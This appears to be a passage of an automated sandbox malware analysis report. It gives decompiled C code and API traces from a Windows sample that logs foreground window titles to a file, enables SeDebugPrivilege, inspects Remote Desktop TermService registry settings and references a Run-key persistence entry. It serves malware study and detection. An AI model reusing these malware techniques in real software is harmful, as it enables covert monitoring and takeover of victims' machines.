                                      0x00257b60
                                      0x00257b68
                                      0x00257b6d
                                      0x00257b6d
                                      0x00257b7f
                                      0x00257b90
                                      0x00257b94
                                      0x00257b99
                                      0x00257bd4
                                      0x00257bd7
                                      0x00257bd7
                                      0x00257bdd
                                      0x00257be3
                                      0x00257be8
                                      0x00257b9b
                                      0x00257bad
                                      0x00257bb7
                                      0x00257bbc
                                      0x00257bc1
                                      0x00257bc6
                                      0x00000000
                                      0x00257bc8
                                      0x00257bc8
                                      0x00257bc8
                                      0x00257bc6
                                      0x00257bfe
                                      0x00257c04
                                      0x00257c16
                                      0x00257c19
                                      0x00257c1d
                                      0x00257c20
                                      0x00257c27
                                      0x00257c2a
                                      0x00257c33
                                      0x00257c35
                                      0x00257c46
                                      0x00257c4e
                                      0x00257c57
                                      0x00257c59
                                      0x00257c5e
                                      0x00257c6a
                                      0x00257c6d
                                      0x00257c76
                                      0x00257c78
                                      0x00257c78
                                      0x00257c7e
                                      0x00257c81
                                      0x00257c88
                                      0x00257c8d
                                      0x00257c96
                                      0x00257c98
                                      0x00257ca0
                                      0x00257cb2

                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00257B14
                                      • GetWindowTextW.USER32(00000000,?,00000104), ref: 00257B27
                                      • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00257B90
                                      • lstrcpyW.KERNEL32(-00000210,?), ref: 00257BDD
                                      • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00257BFE
                                      • lstrlenW.KERNEL32(002629A0,00000008,00000000,?,?), ref: 00257C27
                                      • WriteFile.KERNEL32(?,002629A0,00000000,?,?), ref: 00257C33
                                      • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000), ref: 00257C57
                                      • lstrlenW.KERNEL32(002629A0,-00000008,00000000,?,?), ref: 00257C6A
                                      • WriteFile.KERNEL32(?,002629A0,00000000,?,?), ref: 00257C76
                                      • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00257C88
                                      • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00257C96
                                      • CloseHandle.KERNEL32(?), ref: 00257CA0
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253162: lstrcatW.KERNEL32(00000000,?), ref: 00253192
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                      • String ID: {Unknown}
                                      • API String ID: 2314120260-4054869793
                                      • Opcode ID: 03ec0fb1490c8624238300ccabbfbe0a944fdca8bf8b9a0a788f3093487f3722
                                      • Instruction ID: 979059c251fe07daf600fd48607a16bbe84fb907dcec834ff96cb68627ad9bad
                                      • Opcode Fuzzy Hash: 03ec0fb1490c8624238300ccabbfbe0a944fdca8bf8b9a0a788f3093487f3722
                                      • Instruction Fuzzy Hash: BA516E71A10209EFD704EF64EC8EFAA77A8EB44305F148068F909E7291D7B4AE59CB54
                                      Uniqueness

                                      Uniqueness Score: 8.94%

                                      Function 012E9B3B, Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 012E9B7F
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E9734
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E9746
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E9758
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E976A
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E977C
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E978E
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E97A0
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E97B2
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E97C4
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E97D6
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E97E8
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E97FA
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E980C
                                      • _free.LIBCMT ref: 012E9B74
                                        • Part of subcall function 012E628A: HeapFree.KERNEL32(00000000,00000000), ref: 012E62A0
                                        • Part of subcall function 012E628A: GetLastError.KERNEL32(?,?,012E98A8,?,00000000,?,00000000,?,012E98CF,?,00000007,?,?,012E9CD3,?,?), ref: 012E62B2
                                      • _free.LIBCMT ref: 012E9B96
                                      • _free.LIBCMT ref: 012E9BAB
                                      • _free.LIBCMT ref: 012E9BB6
                                      • _free.LIBCMT ref: 012E9BD8
                                      • _free.LIBCMT ref: 012E9BEB
                                      • _free.LIBCMT ref: 012E9BF9
                                      • _free.LIBCMT ref: 012E9C04
                                      • _free.LIBCMT ref: 012E9C3C
                                      • _free.LIBCMT ref: 012E9C43
                                      • _free.LIBCMT ref: 012E9C60
                                      • _free.LIBCMT ref: 012E9C78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 164af381bd7468ee1c6df53ac027d8c720605b903a3fa641f3dfe61e7475240e
                                      • Instruction ID: 3b5f87b1e015293afa1e48d207b69bcdfcd4e343336c4c02e9387756506b8544
                                      • Opcode Fuzzy Hash: 164af381bd7468ee1c6df53ac027d8c720605b903a3fa641f3dfe61e7475240e
                                      • Instruction Fuzzy Hash: 85319171620306DFEF21AA39DC48BA677E8FF68219F90451AE259D7190EF35A890CB10
                                      Uniqueness

                                      Uniqueness Score: 0.25%

                                      Function 0025B90E, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 71serviceUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025B90E(struct _QUERY_SERVICE_CONFIG* _a4) {
				int _v8;
				void* __ecx;
				void* _t10;
				void* _t26;
				struct _QUERY_SERVICE_CONFIG* _t34;
				void* _t37;

				_v8 = 0;
				_t10 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t37 = _t10;
				if(_t37 != 0) {
					_t26 = OpenServiceW(_t37,  *_a4, 1);
					if(_t26 != 0) {
						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
							_t34 = E00255A87(_v8);
							_a4 = _t34;
							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
								CloseServiceHandle(_t37);
								CloseServiceHandle(_t26);
								E002510C1(_a4);
								_t10 =  *(_t34 + 4);
							} else {
								goto L6;
							}
						} else {
							L6:
							CloseServiceHandle(_t37);
							CloseServiceHandle(_t26);
							goto L7;
						}
					} else {
						CloseServiceHandle(_t37);
						L7:
						_t10 = 0;
					}
				}
				return _t10;
			}









                                      0x0025b91e
                                      0x0025b921
                                      0x0025b927
                                      0x0025b92b
                                      0x0025b940
                                      0x0025b944
                                      0x0025b95e
                                      0x0025b973
                                      0x0025b97c
                                      0x0025b989
                                      0x0025b9a5
                                      0x0025b9a8
                                      0x0025b9ad
                                      0x0025b9b3
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0025b98b
                                      0x0025b98b
                                      0x0025b992
                                      0x0025b995
                                      0x00000000
                                      0x0025b995
                                      0x0025b946
                                      0x0025b947
                                      0x0025b997
                                      0x0025b997
                                      0x0025b997
                                      0x0025b9b5
                                      0x0025b9b9

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0025B921
                                      • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0025B93A
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B947
                                      • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0025B956
                                      • GetLastError.KERNEL32 ref: 0025B960
                                      • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0025B981
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B992
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B995
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B9A5
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B9A8
                                        • Part of subcall function 002510C1: GetProcessHeap.KERNEL32(00000000,00000000,00253341,00000000,00000000,?,?,?,00000000), ref: 002510C7
                                        • Part of subcall function 002510C1: HeapFree.KERNEL32(00000000,?,?), ref: 002510CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                      • String ID: ServicesActive
                                      • API String ID: 1929760286-3071072050
                                      • Opcode ID: 3eb1966f140fa51ee323ae2ba7d89702d06878442057e79c5cfd9f964c35b1f0
                                      • Instruction ID: c70a57a0cdefb342b12925790d3838bd2fbee177f8f439e6e9d1db592d72ff4c
                                      • Opcode Fuzzy Hash: 3eb1966f140fa51ee323ae2ba7d89702d06878442057e79c5cfd9f964c35b1f0
                                      • Instruction Fuzzy Hash: ED115E71911515FBCB129F62EC88D9B7EACEB957517108025FA0592120DBB49E18CEA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025C253, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 259UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E0025C253(struct _CRITICAL_SECTION* __ecx, void* __edx) {
				char _v28;
				char _v32;
				char _v36;
				char _v48;
				char _v52;
				char _v56;
				signed int _v60;
				char _v64;
				char _v68;
				intOrPtr _v76;
				int _t75;
				int _t76;
				int _t79;
				int _t80;
				void* _t82;
				void* _t83;
				int _t84;
				int _t86;
				int _t87;
				int _t93;
				void* _t94;
				int _t132;
				void* _t142;
				char* _t143;
				signed int _t154;
				char* _t184;
				intOrPtr _t193;
				char* _t196;
				void* _t199;
				struct _CRITICAL_SECTION* _t202;
				signed int _t211;
				signed int _t213;
				void* _t215;

				_t199 = __edx;
				_t156 = __ecx;
				_t215 = (_t213 & 0xfffffff8) - 0x34;
				_t202 = __ecx;
				_t154 = 0;
				_v36 = 0;
				_v32 = 0;
				_v56 = 0;
				EnterCriticalSection(__ecx);
				if(E0025DBF3(_t156) == 1) {
					_t156 =  &_v56;
					E0025D5DB( &_v56);
				}
				_t205 = _t202 + 0x38;
				_t75 = PathFileExistsW( *(_t202 + 0x38));
				_t217 = _t75;
				if(_t75 != 0) {
					L11:
					_t206 = _t202 + 0x3c;
					_t76 = PathFileExistsW( *(_t202 + 0x3c));
					__eflags = _t76;
					if(_t76 != 0) {
						L17:
						E0025C033(_t202, _t199);
						E0025C01A(_t202);
						_t159 = _t202;
						_t79 = E0025BDDC(_t202);
						__eflags = _t79;
						if(_t79 != 0) {
							_t160 = _t202;
							_t80 = E0025BD37(_t202, _t199, _t159);
							__eflags = _t80;
							if(_t80 != 0) {
								E0025BFB7(_t160);
								_t82 = E00253412( &_v52, L"SeDebugPrivilege");
								_t83 = GetCurrentProcess();
								_t200 = _t82;
								_t84 = E0025D609(_t83, _t82);
								E00255A2D(_v56);
								__eflags = _t84;
								if(_t84 != 0) {
									_t164 =  *(_t202 + 0x2c);
									_t86 = E0025EC94( *(_t202 + 0x2c));
									__eflags = _t86;
									if(_t86 != 0) {
										Sleep(0x3e8);
										_t87 =  *(_t202 + 0x48);
										__eflags = _t87;
										if(_t87 != 0) {
											_t211 = _t154;
											__eflags = _t211 - _t87;
											do {
												E0025582B(_t164 & 0xffffff00 | __eflags > 0x00000000);
												E0025345A( &_v52,  *((intOrPtr*)(_t202 + 0x40)) + _t211 * 4);
												E0025B889( &_v56);
												_t164 = _v60;
												E00255A2D(_v60);
												_t211 = _t211 + 1;
												_v60 = _t154;
												__eflags = _t211 -  *(_t202 + 0x48);
											} while (_t211 <  *(_t202 + 0x48));
										}
										Sleep(0x1f4);
										E0025345A( &_v52, _t202 + 0x28);
										E0025B889( &_v56);
										_t166 = _v60;
										E00255A2D(_v60);
										Sleep(0x1f4);
										_t93 = E0025B9BC(_t200, __eflags, _v60);
										__eflags = _t93;
										if(_t93 != 0) {
											_t94 = E0025DBF3(_t166);
											__eflags = _t94 - 1;
											if(_t94 == 1) {
												E0025D5B4(_v56);
											}
											E00254B53( *((intOrPtr*)(_t202 + 0x60)), E002547F1( &_v52, _t154, _t202 + 0x58, _t202 + 0x5c));
											E002547CE( &_v68);
											LeaveCriticalSection(_t202);
											_t154 = 8;
										} else {
											_push(_t202 + 0x5c);
											_push(_t202 + 0x58);
											_push(7);
											goto L31;
										}
									} else {
										E0025D5B4(_v56);
										_push(_t202 + 0x5c);
										_push(_t202 + 0x58);
										_push(5);
										goto L31;
									}
								} else {
									E0025D5B4(_v56);
									_push(_t202 + 0x5c);
									_push(_t202 + 0x58);
									_push(3);
									goto L31;
								}
							} else {
								E0025D5B4(_v56);
								_push(_t202 + 0x5c);
								_push(_t202 + 0x58);
								_push(6);
								goto L31;
							}
						} else {
							E0025D5B4(_v56);
							_push(_t202 + 0x5c);
							_push(_t202 + 0x58);
							_push(4);
							L31:
							E00254B53( *((intOrPtr*)(_t202 + 0x60)), E002547F1( &_v52));
							E002547CE( &_v68);
							LeaveCriticalSection(_t202);
						}
					} else {
						E0025345A(_t215, _t206);
						E0025E1A1( &_v32, __eflags, _t156, _t154);
						_t183 =  *((intOrPtr*)(_t202 + 0x54));
						E0026146E( *((intOrPtr*)(_t202 + 0x54)), _t199,  &_v64,  *((intOrPtr*)(_t202 + 0x60)), 3);
						__eflags = _v76 - _t154;
						if(_v76 != _t154) {
							_t184 =  &_v28;
							_t132 = E0025DD8E(_t184, _t183, _t183);
							__eflags = _t132;
							if(_t132 != 0) {
								_push(_t184);
								E0025E0DB( &_v28,  &_v52);
								E0025E0C3( &_v36);
							}
							E00252E66( &_v52);
							E0025DE8B( &_v28, __eflags);
							goto L17;
						} else {
							E00252E66( &_v52);
							goto L7;
						}
					}
				} else {
					E0025345A(_t215, _t205);
					E0025E1A1( &_v32, _t217, _t156, _t154);
					_t142 = E0025DBF3( &_v32);
					_t193 =  *((intOrPtr*)(_t202 + 0x54));
					_t143 =  &_v64;
					if(_t142 != 1) {
						_push(1);
					} else {
						_push(2);
					}
					_push( *((intOrPtr*)(_t202 + 0x60)));
					_push(_t143);
					E00252CCC( &_v48, E0026146E(_t193, _t199));
					_t195 =  &_v68;
					E00252E66( &_v68);
					_t219 = _v52 - _t154;
					if(_v52 != _t154) {
						_t196 =  &_v28;
						__eflags = E0025DD8E(_t196,  &_v68, _t195);
						if(__eflags != 0) {
							_push(_t196);
							E0025E0DB( &_v28,  &_v36);
							E0025E0C3( &_v36);
						}
						_t156 =  &_v28;
						E0025DE8B( &_v28, __eflags);
						goto L11;
					} else {
						L7:
						E0025DE8B( &_v28, _t219);
						_t154 = _t154 | 0xffffffff;
					}
				}
				E00252E66( &_v36);
				return _t154;
			}




































                                      0x0025c253
                                      0x0025c253
                                      0x0025c259
                                      0x0025c25f
                                      0x0025c261
                                      0x0025c264
                                      0x0025c268
                                      0x0025c26c
                                      0x0025c270
                                      0x0025c27e
                                      0x0025c280
                                      0x0025c284
                                      0x0025c284
                                      0x0025c289
                                      0x0025c28e
                                      0x0025c294
                                      0x0025c296
                                      0x0025c329
                                      0x0025c329
                                      0x0025c32e
                                      0x0025c334
                                      0x0025c336
                                      0x0025c3aa
                                      0x0025c3ac
                                      0x0025c3b3
                                      0x0025c3b8
                                      0x0025c3ba
                                      0x0025c3bf
                                      0x0025c3c1
                                      0x0025c3dc
                                      0x0025c3de
                                      0x0025c3e3
                                      0x0025c3e5
                                      0x0025c3ff
                                      0x0025c40d
                                      0x0025c414
                                      0x0025c41a
                                      0x0025c41e
                                      0x0025c429
                                      0x0025c42e
                                      0x0025c430
                                      0x0025c44a
                                      0x0025c44d
                                      0x0025c452
                                      0x0025c454
                                      0x0025c479
                                      0x0025c47b
                                      0x0025c47e
                                      0x0025c480
                                      0x0025c482
                                      0x0025c484
                                      0x0025c486
                                      0x0025c489
                                      0x0025c499
                                      0x0025c4a3
                                      0x0025c4a8
                                      0x0025c4ac
                                      0x0025c4b4
                                      0x0025c4b5
                                      0x0025c4b9
                                      0x0025c4b9
                                      0x0025c4bd
                                      0x0025c4c8
                                      0x0025c4d2
                                      0x0025c4dc
                                      0x0025c4e1
                                      0x0025c4e5
                                      0x0025c4ef
                                      0x0025c4f2
                                      0x0025c4f7
                                      0x0025c4f9
                                      0x0025c529
                                      0x0025c52e
                                      0x0025c531
                                      0x0025c537
                                      0x0025c537
                                      0x0025c552
                                      0x0025c55b
                                      0x0025c561
                                      0x0025c569
                                      0x0025c4fb
                                      0x0025c4fe
                                      0x0025c502
                                      0x0025c503
                                      0x00000000
                                      0x0025c503
                                      0x0025c456
                                      0x0025c45a
                                      0x0025c462
                                      0x0025c466
                                      0x0025c467
                                      0x00000000
                                      0x0025c467
                                      0x0025c432
                                      0x0025c436
                                      0x0025c43e
                                      0x0025c442
                                      0x0025c443
                                      0x00000000
                                      0x0025c443
                                      0x0025c3e7
                                      0x0025c3eb
                                      0x0025c3f3
                                      0x0025c3f7
                                      0x0025c3f8
                                      0x00000000
                                      0x0025c3f8
                                      0x0025c3c3
                                      0x0025c3c7
                                      0x0025c3cf
                                      0x0025c3d3
                                      0x0025c3d4
                                      0x0025c505
                                      0x0025c512
                                      0x0025c51b
                                      0x0025c521
                                      0x0025c521
                                      0x0025c338
                                      0x0025c33d
                                      0x0025c346
                                      0x0025c34b
                                      0x0025c358
                                      0x0025c35d
                                      0x0025c361
                                      0x0025c373
                                      0x0025c377
                                      0x0025c37c
                                      0x0025c37e
                                      0x0025c380
                                      0x0025c38a
                                      0x0025c393
                                      0x0025c393
                                      0x0025c39c
                                      0x0025c3a5
                                      0x00000000
                                      0x0025c363
                                      0x0025c367
                                      0x00000000
                                      0x0025c367
                                      0x0025c361
                                      0x0025c29c
                                      0x0025c2a1
                                      0x0025c2aa
                                      0x0025c2af
                                      0x0025c2b4
                                      0x0025c2ba
                                      0x0025c2be
                                      0x0025c2c4
                                      0x0025c2c0
                                      0x0025c2c0
                                      0x0025c2c0
                                      0x0025c2c6
                                      0x0025c2c9
                                      0x0025c2d4
                                      0x0025c2d9
                                      0x0025c2dd
                                      0x0025c2e2
                                      0x0025c2e6
                                      0x0025c2fb
                                      0x0025c304
                                      0x0025c306
                                      0x0025c308
                                      0x0025c312
                                      0x0025c31b
                                      0x0025c31b
                                      0x0025c320
                                      0x0025c324
                                      0x00000000
                                      0x0025c2e8
                                      0x0025c2e8
                                      0x0025c2ec
                                      0x0025c2f1
                                      0x0025c2f1
                                      0x0025c2e6
                                      0x0025c56e
                                      0x0025c57b

                                      APIs
                                      • EnterCriticalSection.KERNEL32 ref: 0025C270
                                        • Part of subcall function 0025DBF3: GetCurrentProcess.KERNEL32(?,?,00252BBD,?,00262608,?,?,00000000,?,?,?), ref: 0025DBF7
                                      • PathFileExistsW.SHLWAPI(?), ref: 0025C32E
                                      • PathFileExistsW.SHLWAPI(?), ref: 0025C28E
                                        • Part of subcall function 0025DD8E: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 0025DDA5
                                        • Part of subcall function 0025DD8E: GetLastError.KERNEL32(?,?,?,00258715,?,?,?), ref: 0025DDB3
                                      • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0025C521
                                        • Part of subcall function 0025BD37: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0025BD6B
                                      • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0025C414
                                      • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0025C561
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 1717069549-2896544425
                                      • Opcode ID: c63236e2f592dc178e88515ba4bde2c88387eea65294514565d637b78a35582d
                                      • Instruction ID: d0e075e491aaa8bb1ca49f19b3c8f12501f91ed301804b64c70858b190fc1423
                                      • Opcode Fuzzy Hash: c63236e2f592dc178e88515ba4bde2c88387eea65294514565d637b78a35582d
                                      • Instruction Fuzzy Hash: D6916071124305AFC715FFA0DC91DAEB3A8BF44316F500529F95292091EB70EA2CCF99
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025C033, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 111registryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025C033(void* __ecx, void* __edx) {
				void* _v8;
				WCHAR* _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				char _v28;
				int _v32;
				char _v36;
				void* _t50;
				void* _t62;
				void* _t72;
				void* _t96;

				_t96 = __edx;
				_t72 = __ecx;
				_v8 = 0;
				E00253412( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
				E00253412( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v36 = 0;
				_v32 = 0;
				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
					_t50 = E0025EF61( &_v8, _t96, E00253412( &_v16, L"ImagePath"),  &_v36);
					E00255A2D(_v16);
					E0025EF4C( &_v8);
					_t103 = _t50;
					if(_t50 != 0) {
						E00252D08( &_v36, _t103,  &_v12);
						E00252DF3( &_v36);
						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
								_t62 = E0025EF61( &_v8, _t96, E00253412( &_v16, L"ServiceDll"),  &_v36);
								E00255A2D(_v16);
								_t107 = _t62;
								if(_t62 != 0) {
									E00253264(_t72 + 0x20, E00253001( &_v16, E00252D08( &_v36, _t107,  &_v28), _t107));
									E00255A2D(_v16);
									_v16 = _v16 & 0x00000000;
									E00255A2D(_v28);
								}
								E0025EF4C( &_v8);
							}
						}
						E00255A2D(_v12);
						_v12 = _v12 & 0x00000000;
					}
				}
				E00252E66( &_v36);
				E00255A2D(_v20);
				E00255A2D(_v24);
				return E0025EF4C( &_v8);
			}















                                      0x0025c033
                                      0x0025c03b
                                      0x0025c047
                                      0x0025c04a
                                      0x0025c057
                                      0x0025c05f
                                      0x0025c06c
                                      0x0025c07c
                                      0x0025c097
                                      0x0025c0a1
                                      0x0025c0a9
                                      0x0025c0ae
                                      0x0025c0b0
                                      0x0025c0bd
                                      0x0025c0c5
                                      0x0025c0dc
                                      0x0025c10b
                                      0x0025c122
                                      0x0025c12c
                                      0x0025c131
                                      0x0025c133
                                      0x0025c14f
                                      0x0025c157
                                      0x0025c15f
                                      0x0025c163
                                      0x0025c163
                                      0x0025c16b
                                      0x0025c16b
                                      0x0025c10b
                                      0x0025c173
                                      0x0025c178
                                      0x0025c178
                                      0x0025c0b0
                                      0x0025c17f
                                      0x0025c187
                                      0x0025c18f
                                      0x0025c19f

                                      APIs
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 0025C074
                                        • Part of subcall function 0025EF61: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0025F3B9,?,0000000A,80000001), ref: 0025EF84
                                        • Part of subcall function 0025EF61: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,0025F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0025EFA7
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025EF4C: RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      • StrStrW.SHLWAPI(?,svchost.exe), ref: 0025C0D8
                                      • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0025C0E6
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0025C103
                                      Strings
                                      • svchost.exe, xrefs: 0025C0D0
                                      • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0025C03F
                                      • ServiceDll, xrefs: 0025C111
                                      • svchost.exe -k, xrefs: 0025C0DE
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0025C04F
                                      • ImagePath, xrefs: 0025C086
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                      • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                      • API String ID: 2246401353-3333427388
